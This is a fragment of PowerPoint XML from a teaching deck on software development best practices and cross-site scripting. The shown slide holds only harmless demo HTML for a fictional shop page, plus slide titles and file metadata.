              <a:t>; }&lt;/style&gt;&lt;/HEAD&gt;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&lt;BODY&gt;&lt;h1 style='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>text-align:center</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'&gt;Welcome to Caribou Computers&lt;/h1&gt;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&lt;div style="height:100px;border:2px solid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>black;text-align:center;position:relative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;"&gt;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&lt;span style='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>color:green</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;'&gt;Logged in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>as:testg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!&lt;/span&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/&gt;Referred by: &lt;b&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Daves</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Fish Market&lt;/b&gt;&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1597676576"/>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WO.pptx" id="{769520F8-BFE5-4C8C-A7AA-375C025A91CE}" vid="{AEAFD717-D3C8-4034-8F7E-D5220B0CCEB8}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <TotalTime>906</TotalTime>
  <Words>2077</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>97</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Bookman Old Style</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>1_RetrospectVTI</vt:lpstr>
      <vt:lpstr>Software Development &amp; Best Practices</vt:lpstr>
      <vt:lpstr>A7:2017-Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>A7:2017-Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>A7:2017-Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Getting started</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Evilsite.com</vt:lpstr>
      <vt:lpstr>Evilsite.com</vt:lpstr>
      <vt:lpstr>Evilsite.com</vt:lpstr>
      <vt:lpstr>Evilsite.com</vt:lpstr>
      <vt:lpstr>Evilsite.com</vt:lpstr>
      <vt:lpstr>Evilsite.com</vt:lpstr>
      <vt:lpstr>Evilsite.com</vt:lpstr>
      <vt:lpstr>Evilsite.com</vt:lpstr>
      <vt:lpstr>Further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Development &amp; Best Practices</dc:title>
  <dc:creator>Graham, Jonathan</dc:creator>
  <cp:lastModifiedBy>Graham, Jonathan</cp:lastModifiedBy>
  <cp:revision>47</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-03T04:04:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-08T02:06:08Z</dcterms:modified>
</cp:coreProperties>
</file>